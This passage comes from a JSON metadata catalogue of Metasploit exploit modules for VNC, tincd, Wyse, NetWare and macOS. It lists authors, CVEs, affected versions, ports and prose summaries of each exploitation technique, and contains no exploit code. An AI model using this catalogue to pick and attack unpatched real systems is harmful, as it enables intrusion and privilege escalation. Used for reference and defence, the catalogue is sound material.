"description": "This module exploits VNC servers by sending virtual keyboard keys and executing\n a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager\n payload is typed and executed. On Unix/Linux systems a xterm terminal is opened\n and a payload is typed and executed.",
"references": [
"URL-http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VNC Windows / Powershell",
"VNC Windows / VBScript CMDStager",
"VNC Linux / Unix"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/vnc/vnc_keyboard_exec.rb",
"is_install_path": true,
"ref_name": "multi/vnc/vnc_keyboard_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/vpn/tincd_bof": {
"name": "Tincd Post-Authentication Remote TCP Stack Buffer Overflow",
"full_name": "exploit/multi/vpn/tincd_bof",
"rank": 200,
"disclosure_date": "2013-04-22",
"type": "exploit",
"author": [
"Tobias Ospelt <tobias@modzero.ch>",
"Martin Schobert <schobert@modzero.ch>"
],
"description": "This module exploits a stack buffer overflow in Tinc's tincd\n service. After authentication, a specially crafted tcp packet (default port 655)\n leads to a buffer overflow and allows to execute arbitrary code. This module has\n been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7\n (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of\n FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works\n for all versions <= 1.1pre6.\n A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to\n be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd\n was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module\n it was recommended to the maintainer to start using DEP/ASLR and other protection\n mechanisms.",
"references": [
"CVE-2013-1428",
"OSVDB-92653",
"BID-59369",
"URL-http://www.floyd.ch/?p=741",
"URL-http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/"
],
"platform": "",
"arch": "",
"rport": 655,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP x86, tinc 1.1.pre6 (exe installer)",
"Windows 7 x86, tinc 1.1.pre6 (exe installer)",
"FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)",
"Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)",
"Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)",
"Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)",
"OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)",
"Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)",
"Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)",
"Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)",
"Crash only: Fedora 16 x86, tinc 1.0.19 (yum)",
"Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)",
"Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/vpn/tincd_bof.rb",
"is_install_path": true,
"ref_name": "multi/vpn/tincd_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/wyse/hagent_untrusted_hsdata": {
"name": "Wyse Rapport Hagent Fake Hserver Command Execution",
"full_name": "exploit/multi/wyse/hagent_untrusted_hsdata",
"rank": 600,
"disclosure_date": "2009-07-10",
"type": "exploit",
"author": [
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits the Wyse Rapport Hagent service by pretending to\n be a legitimate server. This process involves starting both HTTP and\n FTP services on the attacker side, then contacting the Hagent service of\n the target and indicating that an update is available. The target will\n then download the payload wrapped in an executable from the FTP service.",
"references": [
"CVE-2009-0695",
"OSVDB-55839",
"US-CERT-VU-654545",
"URL-http://snosoft.blogspot.com/",
"URL-http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XPe x86",
"Wyse Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb",
"is_install_path": true,
"ref_name": "multi/wyse/hagent_untrusted_hsdata",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_netware/smb/lsass_cifs": {
"name": "Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",
"full_name": "exploit/netware/smb/lsass_cifs",
"rank": 200,
"disclosure_date": "2007-01-21",
"type": "exploit",
"author": [
"toto"
],
"description": "This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.\n Since the driver runs in the kernel space, a failed exploit attempt can\n cause the OS to reboot.",
"references": [
"CVE-2005-2852",
"OSVDB-12790"
],
"platform": "Netware",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"VMware",
"NetWare 6.5 SP2",
"NetWare 6.5 SP3",
"NetWare 6.5 SP4",
"NetWare 6.5 SP5",
"NetWare 6.5 SP6",
"NetWare 6.5 SP7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/netware/smb/lsass_cifs.rb",
"is_install_path": true,
"ref_name": "netware/smb/lsass_cifs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_netware/sunrpc/pkernel_callit": {
"name": "NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",
"full_name": "exploit/netware/sunrpc/pkernel_callit",
"rank": 400,
"disclosure_date": "2009-09-30",
"type": "exploit",
"author": [
"pahtzo"
],
"description": "This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.\n PKERNEL.NLM is installed by default on all NetWare servers to support NFS.\n The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can\n cause the operating system to reboot.",
"references": [
"BID-36564",
"OSVDB-58447",
"ZDI-09-067"
],
"platform": "Netware",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"NetWare 6.5 SP2",
"NetWare 6.5 SP3",
"NetWare 6.5 SP4",
"NetWare 6.5 SP5",
"NetWare 6.5 SP6",
"NetWare 6.5 SP7",
"NetWare 6.5 SP8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/netware/sunrpc/pkernel_callit.rb",
"is_install_path": true,
"ref_name": "netware/sunrpc/pkernel_callit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/afp/loginext": {
"name": "AppleFileServer LoginExt PathName Overflow",
"full_name": "exploit/osx/afp/loginext",
"rank": 200,
"disclosure_date": "2004-05-03",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the AppleFileServer service\n on MacOS X. This vulnerability was originally reported by Atstake and\n was actually one of the few useful advisories ever published by that\n company. You only have one chance to exploit this bug.\n This particular exploit uses a stack-based return address that will\n only work under optimal conditions.",
"references": [
"CVE-2004-0430",
"OSVDB-5762",
"BID-10271"
],
"platform": "OSX",
"arch": "",
"rport": 548,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.3.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/afp/loginext.rb",
"is_install_path": true,
"ref_name": "osx/afp/loginext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/arkeia/type77": {
"name": "Arkeia Backup Client Type 77 Overflow (Mac OS X)",
"full_name": "exploit/osx/arkeia/type77",
"rank": 200,
"disclosure_date": "2005-02-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Arkeia backup\n client for the Mac OS X platform. This vulnerability affects\n all versions up to and including 5.3.3 and has been tested\n with Arkeia 5.3.1 on Mac OS X 10.3.5.",
"references": [
"CVE-2005-0491",
"OSVDB-14011",
"BID-12594"
],
"platform": "OSX",
"arch": "",
"rport": 617,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Arkeia 5.3.1 Stack Return (boot)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/arkeia/type77.rb",
"is_install_path": true,
"ref_name": "osx/arkeia/type77",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/adobe_flash_delete_range_tl_op": {
"name": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion",
"full_name": "exploit/osx/browser/adobe_flash_delete_range_tl_op",
"rank": 500,
"disclosure_date": "2016-04-27",
"type": "exploit",
"author": [
"Genwei Jiang",
"bcook-r7"
],
"description": "This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.",
"references": [
"CVE-2016-4117",
"BID-90505",
"URL-https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html",
"URL-http://www.securitytracker.com/id/1035826",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa16-02.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb16-15.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X"
],
"mod_time": "2019-02-09 18:46:35 +0000",
"path": "/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb",
"is_install_path": true,
"ref_name": "osx/browser/adobe_flash_delete_range_tl_op",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/mozilla_mchannel": {
"name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free",
"full_name": "exploit/osx/browser/mozilla_mchannel",
"rank": 300,
"disclosure_date": "2011-05-10",
"type": "exploit",
"author": [
"regenrecht",
"Rh0",
"argp <argp@census-labs.com>"
],
"description": "This module exploits a use-after-free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7,\n 10.6.8, 10.7.2 and 10.7.3.",
"references": [
"CVE-2011-0065",
"OSVDB-72085",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986",
"URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/mozilla_mchannel.rb",
"is_install_path": true,
"ref_name": "osx/browser/mozilla_mchannel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_file_policy": {
"name": "Apple Safari file:// Arbitrary Code Execution",
"full_name": "exploit/osx/browser/safari_file_policy",
"rank": 300,
"disclosure_date": "2011-10-12",
"type": "exploit",
"author": [
"Aaron Sigel",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple Safari on OS X platform.\n A policy issue in the handling of file:// URLs may allow arbitrary remote code\n execution under the context of the user.\n\n In order to trigger arbitrary remote code execution, the best way seems to\n be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or\n a file format that OS X might automount), and then execute it in /Volumes/[share].\n If there's some kind of bug that leaks the victim machine's current username,\n then it's also possible to execute the payload in /Users/[username]/Downloads/,\n or else bruteforce your way to getting that information.\n\n Please note that non-java payloads (*.sh extension) might get launched by\n Xcode instead of executing it, in that case please try the Java ones instead.",
"references": [
"CVE-2011-3230",
"OSVDB-76389",
"URL-http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments",
"URL-http://support.apple.com/kb/HT5000"
],
"platform": "Java,OSX,Unix",
"arch": "cmd, java",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Safari 5.1 on OS X",
"Safari 5.1 on OS X with Java"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/osx/browser/safari_file_policy.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_file_policy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_metadata_archive": {
"name": "Safari Archive Metadata Command Execution",
"full_name": "exploit/osx/browser/safari_metadata_archive",
"rank": 600,
"disclosure_date": "2006-02-21",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in Safari's \"Safe file\" feature, which will\n automatically open any file with one of the allowed extensions. This can be abused\n by supplying a zip file, containing a shell script, with a metafile indicating\n that the file should be opened by Terminal.app. This module depends on\n the 'zip' command-line utility.",
"references": [
"CVE-2006-0848",
"OSVDB-23510",
"BID-16736"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/safari_metadata_archive.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_metadata_archive",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_proxy_object_type_confusion": {
"name": "Safari Proxy Object Type Confusion",
"full_name": "exploit/osx/browser/safari_proxy_object_type_confusion",
"rank": 0,
"disclosure_date": "2018-03-15",
"type": "exploit",
"author": [
"saelo"
],
"description": "This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).",
"references": [
"CVE-2018-4233",
"CVE-2018-4404",
"URL-https://github.com/saelo/cve-2018-4233",
"URL-https://github.com/saelo/pwn2own2018",
"URL-https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf"
],
"platform": "OSX",
"arch": "python, cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Python payload",
"Command payload"
],
"mod_time": "2019-01-22 15:39:59 +0000",
"path": "/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_proxy_object_type_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_user_assisted_applescript_exec": {
"name": "Safari User-Assisted Applescript Exec Attack",
"full_name": "exploit/osx/browser/safari_user_assisted_applescript_exec",
"rank": 0,
"disclosure_date": "2015-10-16",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "In versions of Mac OS X before 10.11.1, the applescript:// URL\n scheme is provided, which opens the provided script in the Applescript\n Editor. Pressing cmd-R in the Editor executes the code without any\n additional confirmation from the user. By getting the user to press\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\n can be tricked into running arbitrary Applescript code.\n\n Gatekeeper should be disabled from Security & Privacy in order to\n avoid the unidentified Developer prompt.",
"references": [
"CVE-2015-7007",
"URL-https://support.apple.com/en-us/HT205375"
],
"platform": "OSX,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_user_assisted_applescript_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_user_assisted_download_launch": {
"name": "Safari User-Assisted Download and Run Attack",
"full_name": "exploit/osx/browser/safari_user_assisted_download_launch",
"rank": 0,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module abuses some Safari functionality to force the download of a\n zipped .app OSX application containing our payload. The app is then\n invoked using a custom URL scheme. At this point, the user is presented\n with Gatekeeper's prompt:\n\n \"APP_NAME\" is an application downloaded from the internet. Are you sure you\n want to open it?\n\n If the user clicks \"Open\", the app and its payload are executed.\n\n If the user has the \"Only allow applications downloaded from Mac App Store\n and identified developers (on by default on OS 10.8+), the user will see\n an error dialog containing \"can't be opened because it is from an unidentified\n developer.\" To work around this issue, you will need to manually build and sign\n an OSX app containing your payload with a custom URL handler called \"openurl\".\n\n You can put newlines and unicode in your APP_NAME, although you must be careful not\n to create a prompt that is too tall, or the user will not be able to click\n the buttons, and will have to either logout or kill the CoreServicesUIAgent\n process.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x86 (Native Payload)",
"Mac OS X x64 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_user_assisted_download_launch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/software_update": {
"name": "Apple OS X Software Update Command Execution",
"full_name": "exploit/osx/browser/software_update",
"rank": 600,
"disclosure_date": "2007-12-17",
"type": "exploit",
"author": [
"Moritz Jodeit <moritz@jodeit.org>"
],
"description": "This module exploits a feature in the Distribution Packages,\n which are used in the Apple Software Update mechanism. This feature\n allows for arbitrary command execution through JavaScript. This exploit\n provides the malicious update server. Requests must be redirected to\n this server by other means for this exploit to work.",
"references": [
"CVE-2007-5863",
"OSVDB-40722"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/software_update.rb",
"is_install_path": true,
"ref_name": "osx/browser/software_update",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/email/mailapp_image_exec": {
"name": "Mail.app Image Attachment Command Execution",
"full_name": "exploit/osx/email/mailapp_image_exec",
"rank": 0,
"disclosure_date": "2006-03-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a command execution vulnerability in the\n Mail.app application shipped with Mac OS X 10.5.0. This flaw was\n patched in 10.4 in March of 2007, but reintroduced into the final\n release of 10.5.",
"references": [
"CVE-2006-0395",
"CVE-2007-6165",
"OSVDB-40875",
"BID-26510",
"BID-16907"
],
"platform": "OSX,Unix",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic",
"Mail.app - Command Payloads",
"Mail.app - Binary Payloads (x86)",
"Mail.app - Binary Payloads (ppc)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/email/mailapp_image_exec.rb",
"is_install_path": true,
"ref_name": "osx/email/mailapp_image_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/ftp/webstar_ftp_user": {
"name": "WebSTAR FTP Server USER Overflow",
"full_name": "exploit/osx/ftp/webstar_ftp_user",
"rank": 200,
"disclosure_date": "2004-07-13",
"type": "exploit",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the logging routine\n of the WebSTAR FTP server. Reliable code execution is\n obtained by a series of hops through the System library.",
"references": [
"CVE-2004-0695",
"OSVDB-7794",
"BID-10720"
],
"platform": "OSX",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Mac OS X 10.3.4-10.3.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/ftp/webstar_ftp_user.rb",
"is_install_path": true,
"ref_name": "osx/ftp/webstar_ftp_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/http/evocam_webserver": {
"name": "MacOS X EvoCam HTTP GET Buffer Overflow",
"full_name": "exploit/osx/http/evocam_webserver",
"rank": 200,
"disclosure_date": "2010-06-01",
"type": "exploit",
"author": [
"Paul Harrington",
"dookie"
],
"description": "This module exploits a stack buffer overflow in the web server provided with the EvoCam\n program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.",
"references": [
"CVE-2010-2309",
"OSVDB-65043",
"EDB-12835"
],
"platform": "OSX",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.5.8 x86, EvoCam 3.6.6",
"Mac OS X 10.5.8 x86, EvoCam 3.6.7"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/osx/http/evocam_webserver.rb",
"is_install_path": true,
"ref_name": "osx/http/evocam_webserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/dyld_print_to_file_root": {
"name": "Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation",
"full_name": "exploit/osx/local/dyld_print_to_file_root",
"rank": 500,
"disclosure_date": "2015-07-21",
"type": "exploit",
"author": [
"Stefan Esser",
"joev <joev@metasploit.com>"
],
"description": "In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE environment\n variable is used for redirecting logging data to a file instead of\n stderr. Due to a design error, this feature can be abused by a local\n attacker to write arbitrary files as root via restricted, SUID-root\n binaries.",
"references": [
"CVE-2015-3760",
"URL-https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html",
"URL-https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.10-10.10.4"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/dyld_print_to_file_root.rb",
"is_install_path": true,
"ref_name": "osx/local/dyld_print_to_file_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/iokit_keyboard_root": {
"name": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation",
"full_name": "exploit/osx/local/iokit_keyboard_root",
"rank": 0,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Ian Beer",
"joev <joev@metasploit.com>"
],
"description": "A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory\n corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel\n pointers can also be leaked, allowing a full kASLR bypass.\n\n Tested on Mavericks 10.9.5, and should work on previous versions.\n\n The issue was patched silently in Yosemite.",
"references": [
"CVE-2014-4404",
"URL-http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=40",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=126"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9.5 Mavericks x64 (Native Payload)"
],
"mod_time": "2018-05-31 12:26:33 +0000",
"path": "/modules/exploits/osx/local/iokit_keyboard_root.rb",
"is_install_path": true,
"ref_name": "osx/local/iokit_keyboard_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/libxpc_mitm_ssudo": {
"name": "Mac OS X libxpc MITM Privilege Escalation",
"full_name": "exploit/osx/local/libxpc_mitm_ssudo",
"rank": 600,
"disclosure_date": "2018-03-15",
"type": "exploit",
"author": [
"saelo"
],
"description": "This module exploits a vulnerablity in libxpc on macOS <= 10.13.3\n The task_set_special_port API allows callers to overwrite their bootstrap port,\n which is used to communicate with launchd. This port is inherited across forks:\n child processes will use the same bootstrap port as the parent.\n By overwriting the bootstrap port and forking a child processes, we can now gain\n a MitM position between our child and launchd.\n\n To gain root we target the sudo binary and intercept its communication with\n opendirectoryd, which is used by sudo to verify credentials. We modify the\n replies from opendirectoryd to make it look like our password was valid.",
"references": [
"CVE-2018-4237",
"URL-https://github.com/saelo/pwn2own2018"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x64 (Native Payload)"
],
"mod_time": "2018-11-20 15:58:55 +0000",
"path": "/modules/exploits/osx/local/libxpc_mitm_ssudo.rb",
"is_install_path": true,
"ref_name": "osx/local/libxpc_mitm_ssudo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/nfs_mount_root": {
"name": "Mac OS X NFS Mount Privilege Escalation Exploit",
"full_name": "exploit/osx/local/nfs_mount_root",
"rank": 300,
"disclosure_date": "2014-04-11",
"type": "exploit",
"author": [
"Kenzley Alphonse",
"joev <joev@metasploit.com>"
],
"description": "This exploit leverages a stack overflow vulnerability to escalate privileges.\n The vulnerable function nfs_convert_old_nfs_args does not verify the size\n of a user-provided argument before copying it to the stack. As a result, by\n passing a large size as an argument, a local user can overwrite the stack with arbitrary\n content.\n\n Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.",
"references": [
"EDB-32813"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.7 Lion x64 (Native Payload)"
],
"mod_time": "2018-05-31 12:26:33 +0000",
"path": "/modules/exploits/osx/local/nfs_mount_root.rb",
"is_install_path": true,
"ref_name": "osx/local/nfs_mount_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/persistence": {
"name": "Mac OS X Persistent Payload Installer",
"full_name": "exploit/osx/local/persistence",
"rank": 600,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"Marcin 'Icewall' Noga <marcin@icewall.pl>",
"joev <joev@metasploit.com>"
],
"description": "This module provides a persistent boot payload by creating a plist entry\n in current user's ~/Library/LaunchAgents directory. Whenever the user logs in,\n the LaunchAgent will be invoked and this dropped payload will run.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/local/persistence.rb",
"is_install_path": true,
"ref_name": "osx/local/persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/root_no_password": {
"name": "Mac OS X Root Privilege Escalation",
"full_name": "exploit/osx/local/root_no_password",
"rank": 600,
"disclosure_date": "2017-11-29",
"type": "exploit",
"author": [
"chethan177",
"lemiorhan",
"timwr"
],
"description": "This module exploits a serious flaw in MacOSX High Sierra.\n Any user can login with user \"root\", leaving an empty password.",
"references": [
"CVE-2017-13872",
"URL-https://twitter.com/lemiorhan/status/935578694541770752",
"URL-https://news.ycombinator.com/item?id=15800676",
"URL-https://forums.developer.apple.com/thread/79235"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.13.1 High Sierra x64 (Native Payload)"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/osx/local/root_no_password.rb",
"is_install_path": true,
"ref_name": "osx/local/root_no_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/rootpipe": {
"name": "Apple OS X Rootpipe Privilege Escalation",
"full_name": "exploit/osx/local/rootpipe",
"rank": 500,
"disclosure_date": "2015-04-09",
"type": "exploit",
"author": [
"Emil Kvarnhammar",
"joev <joev@metasploit.com>",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a hidden backdoor API in Apple's Admin framework on\n Mac OS X to escalate privileges to root, dubbed \"Rootpipe.\"\n\n This module was tested on Yosemite 10.10.2 and should work on previous versions.\n\n The patch for this issue was not backported to older releases.\n\n Note: you must run this exploit as an admin user to escalate to root.",
"references": [
"CVE-2015-1130",
"OSVDB-114114",
"EDB-36692",
"URL-https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9-10.10.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/osx/local/rootpipe.rb",
"is_install_path": true,
"ref_name": "osx/local/rootpipe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/rootpipe_entitlements": {
"name": "Apple OS X Entitlements Rootpipe Privilege Escalation",
"full_name": "exploit/osx/local/rootpipe_entitlements",
"rank": 500,
"disclosure_date": "2015-07-01",
